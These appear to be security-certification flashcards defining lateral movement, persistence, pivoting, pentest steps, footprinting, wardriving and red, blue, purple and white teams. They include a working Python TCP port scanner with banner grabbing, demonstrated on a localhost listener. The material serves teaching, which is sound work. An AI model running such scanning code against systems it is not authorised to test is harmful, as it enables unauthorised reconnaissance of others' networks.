- Automates routine security tasks to eliminate tedious work and human error, and speeds up response time
- "Orchestrated" by connecting tools and data sources together, then automation (runbooks / playbooks) takes it from there
187
Define Lateral Movement
- Once an attacker has gained access through one vulnerable point in a network, lateral movement is moving from one internal system to another
- Most networks have strong security on the perimeter but much less inside, making lateral movement much easier than the initial penetration
188
Define Persistence
- Something left behind by an attacker who has penetrated a system so they can easily regain / continue access
- Ex. leaving a backdoor, creating a user account, changing the password of an existing user
- Even if the initial vulnerability / exploit has been closed, persistence allows the attacker to keep accessing the system
189
Define Pivot
- The "pivot" is the point or device used to reach systems that are not normally accessible from the attacker's position
- Serves as a jumping-off point to other systems. Could act as a relay or a proxy
190
List the Steps of a Pentest
- Define the "rules of engagement" in an official document
- Determine working knowledge (how much the testers know about the environment)
- Perform reconnaissance
- Exploit vulnerabilities / try to break into the system
- Attain initial exploitation, then lateral movement, establish persistence, and pivot
- Clean up: leave the network in its original state
191
Define and provide five examples of Passive Footprinting
• Reconnaissance using open sources, without sending traffic to the target's systems, so it goes undetected
Sources could include:
- Social media
- Corporate website
- Online forums
- Social engineering
- Dumpster diving
192
Define Warflying
• Same as wardriving, but performed with a drone flying over buildings/areas
193
Define Wardriving
- Scan Wi-Fi across an area to collect SSIDs, type of encryption used, etc.
- Can be combined with GPS info to generate a map
194
Define and provide examples of Active Footprinting
- Reconnaissance by actively sending traffic to the target's network or devices
- Can gain a lot of information, but the activity is detectable on the network and in logs
Could include:
- Ping sweeps
- Port scans
- DNS queries
- OS scans, OS fingerprinting
- Service scans
- etc.
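A port scan with banner grabbing is the most common active footprinting step, and every connection it makes is exactly what shows up in the target's logs. The following is an added example (not from the flashcards, and not any scanner's own code) of a TCP connect() scan; it runs against a throwaway listener started on localhost so it works offline, and the banner string, port choice and timeouts are assumptions. Only scan systems you are authorised to test under the rules of engagement.

```python
"""Active footprinting: a TCP connect() port scan with banner grabbing,
run here against a throwaway listener on localhost so it works offline
(added example, not from the flashcards). Every connect() shows up in the
target's logs and on the network; that is the detectability the card
describes. Only scan systems you are authorised to test.
"""
import socket
import threading
from concurrent.futures import ThreadPoolExecutor


def probe(host, port, timeout=0.5):
    """Full TCP handshake to one port; returns (port, True) if it accepts."""
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
        s.settimeout(timeout)
        try:
            s.connect((host, port))
        except OSError:          # refused, timed out, unreachable
            return port, False
        return port, True


def scan_ports(host, ports, timeout=0.5, workers=16):
    """Return the sorted list of open ports among `ports`."""
    with ThreadPoolExecutor(max_workers=workers) as pool:
        results = list(pool.map(lambda p: probe(host, p, timeout), ports))
    return sorted(port for port, is_open in results if is_open)


def grab_banner(host, port, timeout=1.0, max_bytes=256):
    """Connect and read whatever the service says first (SSH, SMTP and FTP
    all volunteer a version string). Returns b'' if it stays silent."""
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
        s.settimeout(timeout)
        try:
            s.connect((host, port))
            return s.recv(max_bytes)
        except OSError:
            return b""


def start_demo_listener(banner=b"SSH-2.0-demo_1.0\r\n"):
    """Constructed target for the example: a localhost service that greets
    each client with `banner`. Returns (port, server_socket)."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind(("127.0.0.1", 0))       # port 0: let the OS pick a free port
    srv.listen(8)

    def serve():
        while True:
            try:
                conn, _ = srv.accept()
            except OSError:          # server socket shut down
                return
            with conn:
                try:
                    conn.sendall(banner)
                except OSError:      # scanner already hung up
                    pass

    threading.Thread(target=serve, daemon=True).start()
    return srv.getsockname()[1], srv


def stop_demo_listener(srv):
    """Wake the accept() loop and release the port."""
    try:
        srv.shutdown(socket.SHUT_RDWR)
    except OSError:
        pass
    srv.close()


if __name__ == "__main__":
    port, srv = start_demo_listener()
    try:
        open_ports = scan_ports("127.0.0.1", [port - 1, port, port + 1])
        print("open:", open_ports)
        for p in open_ports:
            print(p, grab_banner("127.0.0.1", p))
    finally:
        stop_demo_listener(srv)
```

A connect() scan completes the handshake, so the service sees an accepted connection and logs it; stealthier variants (SYN scans) need raw sockets and privileges, but still leave the half-open attempts in flow records and IDS logs.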
195
What teams exist in exercises?
- Red team
- Blue team
- Purple team
- White team
196
Define Red team
- Offensive security team
- Hired to attack for exercise purposes
197
Define Blue team
- Defensive security team in an exercise
- Operational security
- Incident response
- Threat hunting
- Digital forensics
198
Define Purple team
• Red team and blue team combined together for an exercise, to work cooperatively rather than competitively
199
Define White team
- Manages the interactions between red teams and blue teams
- Enforces the rules of the security exercise, resolves any issues
- Manages post-event assessments and results